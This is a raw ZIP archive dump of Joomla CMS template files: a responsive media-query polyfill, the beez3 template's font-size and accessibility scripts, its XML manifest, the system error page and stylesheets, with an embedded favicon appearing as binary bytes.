		},

		// Cached container for 1em value, populated the first time it's needed
		eminpx,

		// Enable/disable styles
		applyMedia          = function( fromResize ){
			var name        = "clientWidth",
				docElemProp = docElem[ name ],
				currWidth   = doc.compatMode === "CSS1Compat" && docElemProp || doc.body[ name ] || docElemProp,
				styleBlocks = {},
				lastLink    = links[ links.length-1 ],
				now         = (new Date()).getTime();

			// Throttle resize calls
			if ( fromResize && lastCall && now - lastCall < resizeThrottle ){
				clearTimeout( resizeDefer );
				resizeDefer = setTimeout( applyMedia, resizeThrottle );
				return;
			}
			else {
				lastCall = now;
			}

			for( var i in mediastyles ){
				var thisstyle = mediastyles[ i ],
					min       = thisstyle.minw,
					max       = thisstyle.maxw,
					minnull   = min === null,
					maxnull   = max === null,
					em        = "em";

				if ( !!min ){
					min = parseFloat( min ) * ( min.indexOf( em ) > -1 ? ( eminpx || getEmValue() ) : 1 );
				}
				if ( !!max ){
					max = parseFloat( max ) * ( max.indexOf( em ) > -1 ? ( eminpx || getEmValue() ) : 1 );
				}

				// If there's no media query at all (the () part), or min or max is not null, and if either is present, they're true
				if ( !thisstyle.hasquery || ( !minnull || !maxnull ) && ( minnull || currWidth >= min ) && ( maxnull || currWidth <= max ) ){
						if ( !styleBlocks[ thisstyle.media ] ){
							styleBlocks[ thisstyle.media ] = [];
						}
						styleBlocks[ thisstyle.media ].push( rules[ thisstyle.rules ] );
				}
			}

			// Remove any existing respond style element(s)
			for( var i in appendedEls ){
				if ( appendedEls[ i ] && appendedEls[ i ].parentNode === head ){
					head.removeChild( appendedEls[ i ] );
				}
			}

			// Inject active styles, grouped by media type
			for( var i in styleBlocks ){
				var ss  = doc.createElement( "style" ),
					css = styleBlocks[ i ].join( "\n" );

				ss.type  = "text/css";
				ss.media = i;

				// Originally, ss was appended to a documentFragment and sheets were appended in bulk.
				// This caused crashes in IE in a number of circumstances, such as when the HTML element had a bg image set, so appending beforehand seems best. Thanks to @dvelyk for the initial research on this one!
				head.insertBefore( ss, lastLink.nextSibling );

				if ( ss.styleSheet ){
					ss.styleSheet.cssText = css;
				}
				else {
					ss.appendChild( doc.createTextNode( css ) );
				}

				// Push to appendedEls to track for later removal
				appendedEls.push( ss );
			}
		},
		// Tweaked Ajax functions from Quirksmode
		ajax = function( url, callback ) {
			var req = xmlHttp();
			if (!req){
				return;
			}
			req.open( "GET", url, true );
			req.onreadystatechange = function () {
				if ( req.readyState != 4 || req.status != 200 && req.status != 304 ){
					return;
				}
				callback( req.responseText );
			}
			if ( req.readyState == 4 ){
				return;
			}
			req.send( null );
		},
		// Define ajax obj
		xmlHttp = (function() {
			var xmlhttpmethod = false;
			try {
				xmlhttpmethod = new XMLHttpRequest();
			}
			catch( e ){
				xmlhttpmethod = new ActiveXObject( "Microsoft.XMLHTTP" );
			}
			return function(){
				return xmlhttpmethod;
			};
		})();

	// Translate CSS
	ripCSS();

	// Expose update for re-running respond later on
	respond.update = ripCSS;

	// Adjust on resize
	function callMedia(){
		applyMedia( true );
	}
	if ( win.addEventListener ){
		win.addEventListener( "resize", callMedia, false );
	}
	else if( win.attachEvent ){
		win.attachEvent( "onresize", callMedia );
	}
})(this);
PK!�sR��	�	#beez3/javascript/md_stylechanger.jsnu&1i�/*global window, localStorage, fontSizeTitle, bigger, reset, smaller, biggerTitle, resetTitle, smallerTitle, Cookie */
var prefsLoaded = false;
var defaultFontSize = 100;
var currentFontSize = defaultFontSize;



Object.append(Browser.Features, {
	localstorage: (function() {
		return ('localStorage' in window) && window.localStorage !== null;
	})()
});

function setFontSize(fontSize) {
	document.body.style.fontSize = fontSize + '%';
}

function changeFontSize(sizeDifference) {
	currentFontSize = parseInt(currentFontSize, 10) + parseInt(sizeDifference * 5, 10);
	if (currentFontSize > 180) {
		currentFontSize = 180;
	} else if (currentFontSize < 60) {
		currentFontSize = 60;
	}
	setFontSize(currentFontSize);
}

function revertStyles() {
	currentFontSize = defaultFontSize;
	changeFontSize(0);
}

function writeFontSize(value) {
	if (Browser.Features.localstorage) {
		localStorage.fontSize = value;
	} else {
		Cookie.write("fontSize", value, {duration: 180});
	}
}

function readFontSize() {
	if (Browser.Features.localstorage) {
		return localStorage.fontSize;
	} else {
		return Cookie.read("fontSize");
	}
}

function setUserOptions() {
	if (!prefsLoaded) {
		var size = readFontSize();
		currentFontSize = size ? size : defaultFontSize;
		setFontSize(currentFontSize);
		prefsLoaded = true;
	}
}

function addControls() {
	var container = document.id('fontsize');
	var content = '<h3>'+ fontSizeTitle +'</h3><p><a title="'+ biggerTitle +'"  href="#" onclick="changeFontSize(2); return false">'+ bigger +'</a><span class="unseen">.</span><a href="#" title="'+resetTitle+'" onclick="revertStyles(); return false">'+ reset +'</a><span class="unseen">.</span><a href="#"  title="'+ smallerTitle +'" onclick="changeFontSize(-2); return false">'+ smaller +'</a></p>';
	container.set('html', content);
}

function saveSettings() {
	writeFontSize(currentFontSize);
}


window.addEvent('domready', function () {

    smaller = Joomla.JText._('TPL_BEEZ3_SMALLER');
    fontSizeTitle = Joomla.JText._('TPL_BEEZ3_FONTSIZE');
    bigger = Joomla.JText._('TPL_BEEZ3_BIGGER');
    reset = Joomla.JText._('TPL_BEEZ3_RESET');
    biggerTitle = Joomla.JText._('TPL_BEEZ3_INCREASE_SIZE');
    smallerTitle = Joomla.JText._('TPL_BEEZ3_DECREASE_SIZE');
    resetTitle = Joomla.JText._('TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT');

});
window.addEvent('domready', setUserOptions);
window.addEvent('domready', addControls);
window.addEvent('unload', saveSettings);
PK!�~�""beez3/javascript/hide.jsnu&1i�// Angie Radtke 2009 - 2012  thanks to daniel //

/*global window, localStorage, Cookie, altopen, altclose, big, small, rightopen, rightclose, bildauf, bildzu */

function saveIt(name) {
	var x = document.getElementById(name).style.display;

	if (!x) {
		alert('No cookie available');
	} else if (localStorage) {
		localStorage[name] = x;
	}
}

function readIt(name) {
	if (localStorage) {
		return localStorage[name];
	}
}

function wrapperwidth(width) {
	jQuery('#wrapper').css('width', width);
}

// add Wai-Aria landmark-roles
jQuery(function($) {
	$('#nav').attr('role', 'navigation');
	$('input[id^="mod-search-searchword"]').closest('form').attr('role', 'search');
	$('#main').attr('role', 'main');
	$('#right').attr('role', 'contentinfo');
});

jQuery(function($) {
		// get ankers
		var $myankers = $('a.opencloselink');
		$myankers.each(function() {
			var $element = $(this);
			$element.attr('role', 'tab');
			var myid = $element.attr('id');
			myid = myid.split('_');
			myid = 'module_' + myid[1];
			$element.attr('aria-controls', myid);
		});

		var $list = $('div.moduletable_js');
		$list.each(function() {
			var $element = $(this);
			if ($element.find('div.module_content').length) {
				var $el = $element.find('div.module_content');
				$el.attr('role', 'tabpanel');
				var myid = $el.attr('id');
				myid = myid.split('_');
				myid = 'link_' + myid[1];
				$el.attr('aria-labelledby', myid);
				var myclass = $el.attr('class');
				var one = myclass.split(' ');
				// search for active menu-item
				var $listelement = $el.find('a.active').first();
				var unique = $el.attr('id');
				var nocookieset = readIt(unique);
				if (($listelement.length) || ((one[1] == 'open') && (nocookieset == null))) {
					$el.show();
					var $eltern = $el.parent();
					var $elternh = $eltern.find('h3').first();
					var $elternbild = $eltern.find('img').first();
					$elternbild.attr('alt', altopen).attr('src', bildzu);
					$elternbild.focus();
				} else {
					$el.hide();
					$el.attr('aria-expanded', 'false');
				}

				unique = $el.attr('id');
				var cookieset = readIt(unique);
				if (cookieset === 'block') {
					$el.show();
					$el.attr('aria-expanded', 'true');
				}

			}
		});
	});

jQuery(function($) {
	var $what = $('#right');
	// if rightcolumn
	if ($what.length) {
		var whatid = $what.attr('id');
		var rightcookie = readIt(whatid);
		if (rightcookie === 'none') {
			$what.hide();
			$('#nav').addClass('leftbigger');
			wrapperwidth(big);
			var $grafik = $('#bild');
			$grafik.html(rightopen);
			$grafik.focus();
		}
	}
});

function auf(key) {
	var $ = jQuery.noConflict();
	var $el = $('#' + key);

	if (!$el.is(':visible')) {
		$el.show();
		$el.attr('aria-expanded', 'true');

		if (key !== 'right') {
			$el.hide().toggle('slide');
			$el.parent().attr('class', 'slide');
			$eltern = $el.parent().parent();
			$elternh = $eltern.find('h3').first();
			$elternh.addClass('high');
			$elternbild = $eltern.find('img').first();
			$el.focus();
			$elternbild.attr('alt', altopen).attr('src', bildzu);
		}

		if (key === 'right') {
			$('#right').show();
			wrapperwidth(small);
			$('#nav').removeClass('leftbigger');
			$grafik = $('#bild');
			$('#bild').html(rightclose);
			$grafik.focus();
		}
	} else {
		$el.hide();
		$el.attr('aria-expanded', 'false');

		$el.removeClass('open');

		if (key !== 'right') {
			$eltern = $el.parent().parent();
			$elternh = $eltern.find('h3').first();
			$elternh.removeClass('high');
			$elternbild = $eltern.find('img').first();
			$elternbild.attr('alt', altclose).attr('src', bildauf);
			$elternbild.focus();
		}

		if (key === 'right') {
			$('#right').hide();
			wrapperwidth(big);
			$('#nav').addClass('leftbigger');
			$grafik = $('#bild');
			$grafik.html(rightopen);
			$grafik.focus();
		}
	}
	// write cookie
	saveIt(key);
}

// ########### Tabfunctions ####################

jQuery(function($) {
	var $alldivs = $('div.tabcontent');
	var $outerdivs = $('div.tabouter');
	//outerdivs = outerdivs.getProperty('id');

	$outerdivs.each(function() {
		var $alldivs = $(this).find('div.tabcontent');
		var count = 0;
		var countankers = 0;
		$alldivs.each(function() {
		var $el = $(this);
			count++;
			$el.attr('role', 'tabpanel');
			$el.attr('aria-hidden', 'false');
			$el.attr('aria-expanded', 'true');
			elid = $el.attr('id');
			elid = elid.split('_');
			elid = 'link_' + elid[1];
			$el.attr('aria-labelledby', elid);

			if (count !== 1) {
				$el.addClass('tabclosed').removeClass('tabopen');
				$el.attr('aria-hidden', 'true');
				$el.attr('aria-expanded', 'false');
			}
		});

		$allankers = $(this).find('ul.tabs').first().find('a');

		$allankers.each(function() {
			countankers++;
			var $el = $(this);
			$el.attr('aria-selected', 'true');
			$el.attr('role', 'tab');
			linkid = $el.attr('id');
			moduleid = linkid.split('_');
			moduleid = 'module_' + moduleid[1];
			$el.attr('aria-controls', moduleid);

			if (countankers != 1) {
				$el.addClass('linkclosed').removeClass('linkopen');
				$el.attr('aria-selected', 'false');
			}
		});
	});
});

function tabshow(elid) {
	var $ = jQuery.noConflict();
	var $el = $('#' + elid);
	var $outerdiv = $el.parent();

	var $alldivs = $outerdiv.find('div.tabcontent');
	var $liste = $outerdiv.find('ul.tabs').first();

	$liste.find('a').attr('aria-selected', 'false');

	$alldivs.each(function() {
		var $element = $(this);
		$element.addClass('tabclosed').removeClass('tabopen');
		$element.attr('aria-hidden', 'true');
		$element.attr('aria-expanded', 'false');
	});

	$el.addClass('tabopen').removeClass('tabclosed');
	$el.attr('aria-hidden', 'false');
	$el.attr('aria-expanded', 'true');
	$el.focus();
	var getid = elid.split('_');
	var activelink = '#link_' + getid[1];
	$(activelink).attr('aria-selected', 'true');
	$liste.find('a').addClass('linkclosed').removeClass('linkopen');
	$(activelink).addClass('linkopen').removeClass('linkclosed');
}

function nexttab(el) {
	var $ = jQuery.noConflict();
	var $outerdiv = $('#' + el).parent();
	var $liste = $outerdiv.find('ul.tabs').first();
	var getid = el.split('_');
	var activelink = '#link_' + getid[1];
	var aktiverlink = $(activelink).attr('aria-selected');
	var $tablinks = $liste.find('a');

	for (var i = 0; i < $tablinks.length; i++) {
		if ($($tablinks[i]).attr('id') === activelink) {
			if ($($tablinks[i + 1]).length) {
				$($tablinks[i + 1]).click();
				break;
			}
		}
	}
}

// mobilemenuheader
var mobileMenu = function(){

	var $ = jQuery.noConflict(), displayed = false, $mobile, $menu, $menuWrapper;

	var getX = function() {
		return $(document).width();
	};

	var createElements = function () {
		var Openmenu=Joomla.JText._('TPL_BEEZ3_OPENMENU');
		var Closemenu=Joomla.JText._('TPL_BEEZ3_CLOSEMENU');
		$menu = $("#header").find('ul.menu').first();
		$menuWrapper = $('<div>', {id : 'menuwrapper', role: 'menubar'});

		// create the menu opener and assign events
		$mobile = $('<div>', {id: 'mobile_select'}).html('<h2><a href="#" id="menuopener" onclick="return false;"><span>'+Openmenu+'</span></a></h2>').show();
		$mobile.on('click', function(){
			var state = $menuWrapper.css('display');
			$menuWrapper.slideToggle();

			if (state === 'none') {
				$('#menuopener').html(Closemenu);
				$('#menuwrapper').attr('aria-expanded', 'true').attr('aria-hidden','false');
			} else {
				$('#menuopener').html(Openmenu);
				$('#menuwrapper').attr('aria-expanded', 'false').attr('aria-hidden', 'true');
			}
		});

		// add the menu to the dom
		$menu.wrap($menuWrapper);

		// add the menuopener to the dom and hide it
		$('#header').find('#menuwrapper').first().before($mobile.hide());
		$menuWrapper = $('#menuwrapper');
		$mobile = $('#mobile_select');

	};
	var display = function () {
		$menuWrapper.hide();
		$mobile.show();
		displayed = true;
	};

	var initialize = function () {
		// create the elements once
		createElements();

		// show the elements if the browser size is smaller
		if (getX() <= 461 && !displayed) {
			display();
		}

		// react on resize events
		$(window).on('resize', function () {
			if (getX() >= 461) {
				if (displayed) {
					$mobile.hide();
					$('#menuwrapper').show();
					displayed = false;
				}
			}
			if (getX() < 461) {
				if (!displayed) {
					display();
				}

			}
		});
	};

	initialize();
};

jQuery(function () {
	new mobileMenu();
});



//For discussion and comments, see: http://remysharp.com/2009/01/07/html5-enabling-script/
(function(){if(!/*@cc_on!@*/0)return;var e = "abbr,article,aside,audio,canvas,datalist,details,eventsource,figure,footer,header,hgroup,mark,menu,meter,nav,output,progress,section,time,video".split(','),i=e.length;while(i--){document.createElement(e[i])}})()

PK!"
����beez3/favicon.iconu&1i��PNG


IHDR�asRGB���	pHYs��$iTXtXML:com.adobe.xmp<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:xmp="http://ns.adobe.com/xap/1.0/">
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <tiff:Compression>5</tiff:Compression>
         <tiff:XResolution>72</tiff:XResolution>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:YResolution>72</tiff:YResolution>
         <exif:PixelXDimension>16</exif:PixelXDimension>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelYDimension>16</exif:PixelYDimension>
         <dc:subject>
            <rdf:Seq/>
         </dc:subject>
         <xmp:ModifyDate>2015:03:15 13:03:46</xmp:ModifyDate>
         <xmp:CreatorTool>Pixelmator 3.3.1</xmp:CreatorTool>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
>Iv]XIDAT8}�]h\E�ϙ�{wﺻI]m�XClK4�RE�w-E��(->�f|)y�~(Z�"ȢA�R�h�Z�B46M��-$ӆ6&-k41����c�xn��S��\����s��g;^��t}�Pc{���յ��
׽�uQ��{VJ�5"I"�:�����X���7���O))����:L;�j8�lQ�P ��%!��럒|2��qye��4��m�m<3�@�!��$�+c粒���J�ۤ-S�R��Hk�A8$��k���
)��[�O�/�ov,�6�˔�}�O0|�
��n�����N�ҀF�{Ӂ�{ǽLK�)��{�|�G�� ʭ�"W���?��X-����Y�W�~Rn�2�˰o.� x�*S߇�Kê:
�4`DF�oԝ.(Y�&pKq��ѵX�n���9�bbn��|��cc�N��ݛZĴ�&��ܖۑ�t�B���Trj]ޱ*�Sxqd�w?��	p�|���n�)3^E8Y��⑷g"rU`Wn�A�O�5���?�H�lpY[��Q8��+��]��r�q�oޱe��t����j	Z�G�O\}�����r���7�wَ�C����V6t�b70j�#Ū�!��_WH+��R����F&/������Ϗ��j.9W���xZA!�/�W>	`[�X;���GP���w6�V���R�{4w�e��WD�0�Α�h�������Lȣ��%J�Л��z����=i ZϰŠ��Q����^"���O:58՛�k��~h���l`M��ǽS�qV1DZ���m���hb��w�yu�K����o��;�������DS(IEND�B`�PK!�f��beez3/templateDetails.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE install PUBLIC "-//Joomla! 2.5//DTD template 1.0//EN" "https://www.joomla.org/xml/dtd/1.6/template-install.dtd">
<extension version="3.1" type="template" client="site">
	<name>beez3</name>
	<creationDate>25 November 2009</creationDate>
	<author>Angie Radtke</author>
	<authorEmail>a.radtke@derauftritt.de</authorEmail>
	<authorUrl>http://www.der-auftritt.de</authorUrl>
	<copyright>Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.</copyright>
	<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
	<version>3.1.0</version>
	<description>TPL_BEEZ3_XML_DESCRIPTION</description>

	<files>
		<folder>css</folder>
		<folder>html</folder>
		<folder>images</folder>
		<folder>javascript</folder>
		<folder>language</folder>
		<filename>index.php</filename>
		<filename>templateDetails.xml</filename>
		<filename>template_preview.png</filename>
		<filename>template_thumbnail.png</filename>
		<filename>jsstrings.php</filename>
		<filename>favicon.ico</filename>
		<filename>component.php</filename>
		<filename>error.php</filename>
	</files>

	<positions>
		<position>debug</position>
		<position>position-0</position>
		<position>position-1</position>
		<position>position-2</position>
		<position>position-3</position>
		<position>position-4</position>
		<position>position-5</position>
		<position>position-6</position>
		<position>position-7</position>
		<position>position-8</position>
		<position>position-9</position>
		<position>position-10</position>
		<position>position-11</position>
		<position>position-12</position>
		<position>position-13</position>
		<position>position-14</position>
	</positions>

	<!-- 	For core templates, we also install/uninstall the language files in the core language folders.
	-->
	<languages folder="language">
		<language tag="en-GB">en-GB/en-GB.tpl_beez3.ini</language>
		<language tag="en-GB">en-GB/en-GB.tpl_beez3.sys.ini</language>
	</languages>

	<config>
		<fields name="params">
			<fieldset name="advanced">
				<field 
					name="wrapperSmall"  
					type="number" 
					label="TPL_BEEZ3_FIELD_WRAPPERSMALL_LABEL"
					description="TPL_BEEZ3_FIELD_WRAPPERSMALL_DESC"
					class="validate-numeric" 
					default="53"
					filter="integer"
				/>

				<field 
					name="wrapperLarge"  
					type="number" 
					label="TPL_BEEZ3_FIELD_WRAPPERLARGE_LABEL"
					description="TPL_BEEZ3_FIELD_WRAPPERLARGE_DESC"
					class="validate-numeric" 
					default="72"
					filter="integer"
				 />

				<field 
					name="logo"
					type="media"
					label="TPL_BEEZ3_FIELD_LOGO_LABEL" 
					description="TPL_BEEZ3_FIELD_LOGO_DESC" 
				/>

				<field 
					name="sitetitle"  
					type="text" 
					label="TPL_BEEZ3_FIELD_SITETITLE_LABEL"
					description="TPL_BEEZ3_FIELD_SITETITLE_DESC"
					default=""
					filter="string" 
				/>

				<field 
					name="sitedescription"  
					type="text" 
					label="TPL_BEEZ3_FIELD_DESCRIPTION_LABEL"
					description="TPL_BEEZ3_FIELD_DESCRIPTION_DESC"
					default=""
					filter="string" 
				/>

				<field 
					name="navposition" 
					type="list" 
					label="TPL_BEEZ3_FIELD_NAVPOSITION_LABEL"
					description="TPL_BEEZ3_FIELD_NAVPOSITION_DESC"
					default="center"
					filter="word"
					>
					<option value="center">TPL_BEEZ3_OPTION_AFTER_CONTENT</option>
					<option value="left">TPL_BEEZ3_OPTION_BEFORE_CONTENT</option>
				</field>

				<field 
					name="bootstrap" 
					type="textarea"
					label="TPL_BEEZ3_FIELD_BOOTSTRAP_LABEL"
					description="TPL_BEEZ3_FIELD_BOOTSTRAP_DESC"
					rows="4" 
					columns="30"
				/>

				<field
					name="templatecolor" 
					type="list" 
					label="TPL_BEEZ3_FIELD_TEMPLATECOLOR_LABEL"
					description="TPL_BEEZ3_FIELD_TEMPLATECOLOR_DESC"
					default="nature"
					filter="word"
					>
					<option value="nature">TPL_BEEZ3_OPTION_NATURE</option>
					<option value="personal">TPL_BEEZ3_OPTION_PERSONAL</option>
					<option value="red">TPL_BEEZ3_OPTION_RED</option>
					<option value="turq">TPL_BEEZ3_OPTION_TURQ</option>
					<option value="image">TPL_BEEZ3_OPTION_IMAGE</option>
				</field>

				<field 
					name="headerImage" 
					type="media"
					label="TPL_BEEZ3_FIELD_HEADER_IMAGE_LABEL" 
					description="TPL_BEEZ3_FIELD_HEADER_IMAGE_DESC" 
					showon="templatecolor:image" 
				/>

				<field 
					name="backgroundcolor" 
					type="color" 
					label="TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_LABEL"
					description="TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_DESC"
					default="#eee"
					showon="templatecolor:image" 
				/>

			</fieldset>
		</fields>
	</config>
</extension>
PK!���7\\system/error.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Template.system
 *
 * @copyright   (C) 2006 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\Language\Text;
use Joomla\CMS\Router\Route;

/** @var \Joomla\CMS\Document\ErrorDocument $this */

// Load template CSS file
$this->getWebAssetManager()->registerAndUseStyle('template.system.error', 'administrator/templates/system/css/error.css');

// Set page title
$this->setTitle($this->error->getCode() . ' - ' . htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'));
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="metas" />
	<jdoc:include type="styles" />
	<jdoc:include type="scripts" />
</head>
<body>
	<table class="outline">
		<tr>
			<td style="text-align: center;">
				<h1><?php echo $this->error->getCode() ?> - <?php echo Text::_('JERROR_AN_ERROR_HAS_OCCURRED'); ?></h1>
			</td>
		</tr>
		<tr>
			<td style="text-align: center;">
				<p>
					<?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?>
					<?php if ($this->debug) : ?>
						<br><?php echo htmlspecialchars($this->error->getFile(), ENT_QUOTES, 'UTF-8');?>:<?php echo $this->error->getLine(); ?>
					<?php endif; ?>
				</p>
				<p><a href="<?php echo Route::_('index.php'); ?>"><?php echo Text::_('JGLOBAL_TPL_CPANEL_LINK_TEXT'); ?></a></p>
				<?php if ($this->debug) : ?>
					<div>
						<?php echo $this->renderBacktrace(); ?>
						<?php // Check if there are more Exceptions and render their data as well ?>
						<?php if ($this->error->getPrevious()) : ?>
							<?php $loop = true; ?>
							<?php // Reference $this->_error here and in the loop as setError() assigns errors to this property and we need this for the backtrace to work correctly ?>
							<?php // Make the first assignment to setError() outside the loop so the loop does not skip Exceptions ?>
							<?php $this->setError($this->_error->getPrevious()); ?>
							<?php while ($loop === true) : ?>
								<p><strong><?php echo Text::_('JERROR_LAYOUT_PREVIOUS_ERROR'); ?></strong></p>
								<p>
									<?php echo htmlspecialchars($this->_error->getMessage(), ENT_QUOTES, 'UTF-8'); ?>
									<br><?php echo htmlspecialchars($this->_error->getFile(), ENT_QUOTES, 'UTF-8');?>:<?php echo $this->_error->getLine(); ?>
								</p>
								<?php echo $this->renderBacktrace(); ?>
								<?php $loop = $this->setError($this->_error->getPrevious()); ?>
							<?php endwhile; ?>
							<?php // Reset the main error object to the base error ?>
							<?php $this->setError($this->error); ?>
						<?php endif; ?>
					</div>
				<?php endif; ?>
			</td>
		</tr>
	</table>

	<jdoc:include type="modules" name="debug" style="none" />
</body>
</html>
PK!Q\ʼ��system/css/editor.cssnu&1i�/**
 * @copyright	Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

body {
	background: #fff;
	font-family: Tahoma, Helvetica, Arial, sans-serif;
	line-height: 1.3em;
	font-size: 76%;
	color: #333;
}

h1 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 16px;
	font-weight: bold;
	color: #666;
}

h2 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 14px;
	font-weight: normal;
	color: #333;
}

h3 {
  font-weight: bold;
  font-family: Arial, Helvetica, sans-serif;
  font-size: 13px;
  color: #135cae;
}

h4 {
	font-weight: bold;
	font-family: Arial, Helvetica, sans-serif;
	color: #333;
}

a:link, a:visited {
	color: #1B57B1; 
	text-decoration: none;
	font-weight: normal;
}

a:hover {
	color: #00c;	
	text-decoration: underline;
	font-weight: normal;
}

div.caption       { padding: 0 10px 0 10px; }
div.caption img   { border: 1px solid #CCC; }
div.caption p     { font-size: .90em; color: #666; text-align: center; }

/* STYLES FOR JOOMLA! EDITOR */
hr#system-readmore  { border: red dashed 1px; color: red; }
hr.system-pagebreak { border: gray dashed 1px; color: gray; }
PK!a����system/css/system.cssnu&1i�/**
 * @copyright	Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */
/* System Messages */
#system-message {
  padding: 0;
  margin-bottom: 10px;
}

#system-message > dt {
  display: none;
  font-weight: bold;
}

#system-message > dd {
  margin: 0;
  font-weight: bold;
  text-indent: 30px;
}

#system-message > dd > ul {
  padding: 10px;
  margin-bottom: 10px;
  color: #05b;
  list-style: none;
  background-repeat: no-repeat;
  background-position: 4px top;
  border-top: 3px solid #84a7db;
  border-bottom: 3px solid #84a7db;
}

#system-message > dd > ul > li {
  line-height: 1.5em;
}

/* System Standard Messages */
#system-message > .message > ul {
  background-color: #c3d2e5;
}

/* System Error Messages */
#system-message > .error > ul,
#system-message > .warning > ul,
#system-message > .notice > ul {
  color: #c00;
}

#system-message > .error > ul {
  background-color: #e6c0c0;
  border-color: #de7a7b;
}

/* System Warning Messages */
#system-message > .warning > ul {
  background-color: #e6c8a6;
  border-color: #fb0;
}

/* System Notice Messages */
#system-message > .notice > ul {
  background-color: #efe7b8;
  border-color: #f0dc7e;
}PK!��$$system/css/offline_rtl.cssnu&1i�/**
 * @copyright	Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

 /**
 * Joomla! 1.5 Offline RTL css file
 *
 * @package				Joomla
 * @since				1.5
 * @version				1.0
 */

#frame form{ text-align: right; }
label { float:right; }
fieldset.input p {clear: right;}

/* -- message styles ----------------------------------- */
.alert {
	padding: 8px 8px 25px 14px;
	text-align: right;
}
.alert .close {
	float: left;
	left: -20px;
	right: 0px;
}PK!j�W�//system/css/error.cssnu&1i�/**
 * @copyright  (C) 2006 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */
.outline {
  width: 550px;
  padding: 2px;
  margin: 0 auto;
  background: #fff;
  border: 1px solid #ccc;
}

body {
  height: 100%;
  padding: 0;
  margin: 15px;
  font-family: Arial, Helvetica, Sans Serif;
  font-size: 11px;
  color: #333;
  background: #fff;
}

.frame {
  padding: 8px;
  margin-top: 13px;
  margin-bottom: 25px;
  background-color: #fefcf3;
  border: solid 1px #000;
}

h1 {
  font-size: 18px;
  color: #c33;
}

.table {
  margin-top: 13px;
  border-collapse: collapse;
}

td {
  padding: 3px 5px;
  font-size: 10px;
  border: solid 1px #bbb;
}

.type {
  padding: 3px;
  font-weight: bold;
  color: #fff;
  background-color: #c00;
}PK!��
�
system/css/general.cssnu&1i�/**
 * @copyright	Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

/* Form validation */
.invalid { border-color: #ff0000; }
label.invalid { color: #ff0000; }

/* Buttons */
#editor-xtd-buttons {
	padding: 5px;
}

.button2-left,
.button2-right,
.button2-left div,
.button2-right div {
	float: left;
}

.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
	display: block;
	height: 22px;
	float: left;
	line-height: 22px;
	font-size: 11px;
	color: #666;
	cursor: pointer;
}

.button2-left span,
.button2-right span {
	cursor: default;
	color: #999;
}

.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
	padding: 0 6px;
}

.page span {
	color: #000;
	font-weight: bold;
}

.button2-left a:hover,
.button2-right a:hover {
	text-decoration: none;
	color: #0B55C4;
}

.button2-left a,
.button2-left span {
	padding: 0 24px 0 6px;
}

.button2-right a,
.button2-right span {
	padding: 0 6px 0 24px;
}

.button2-left {
	background: url(../images/j_button2_left.png) no-repeat;
	float: left;
	margin-left: 5px;
}

.button2-right {
	background: url(../images/j_button2_right.png) 100% 0 no-repeat;
	float: left;
	margin-left: 5px;
}

.button2-left .image {
	background: url(../images/j_button2_image.png) 100% 0 no-repeat;
}

.button2-left .readmore,
.button2-left .article {
	background: url(../images/j_button2_readmore.png) 100% 0 no-repeat;
}

.button2-left .pagebreak {
	background: url(../images/j_button2_pagebreak.png) 100% 0 no-repeat;
}

.button2-left .blank {
	background: url(../images/j_button2_blank.png) 100% 0 no-repeat;
}

/* Tooltips */
div.tooltip {
	float: left;
	background: #ffc;
	border: 1px solid #D4D5AA;
	padding: 5px;
	max-width: 200px;
	z-index:13000;
}

div.tooltip h4 {
	padding: 0;
	margin: 0;
	font-size: 95%;
	font-weight: bold;
	margin-top: -15px;
	padding-top: 15px;
	padding-bottom: 5px;
	background: url(../images/selector-arrow.png) no-repeat;
}

div.tooltip p {
	font-size: 90%;
	margin: 0;
}

/* Caption fixes */
/* Caption fixes */
.img_caption .left {
        float: left;
        margin-right: 1em;
}

.img_caption .right {
        float: right;
        margin-left: 1em;
}

.img_caption .left p {
        clear: left;
        text-align: center;
}

.img_caption .right p {
        clear: right;
        text-align: center;
}

.img_caption  {
	text-align: center!important;
}

.img_caption.none {
	margin-left:auto;
	margin-right:auto;
}


/* Calendar */
a img.calendar {
	width: 16px;
	height: 16px;
	margin-left: 3px;
	background: url(../images/calendar.png) no-repeat;
	cursor: pointer;
	vertical-align: middle;
}
PK!������system/css/offline.cssnu&1i�/**
 * @copyright	Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
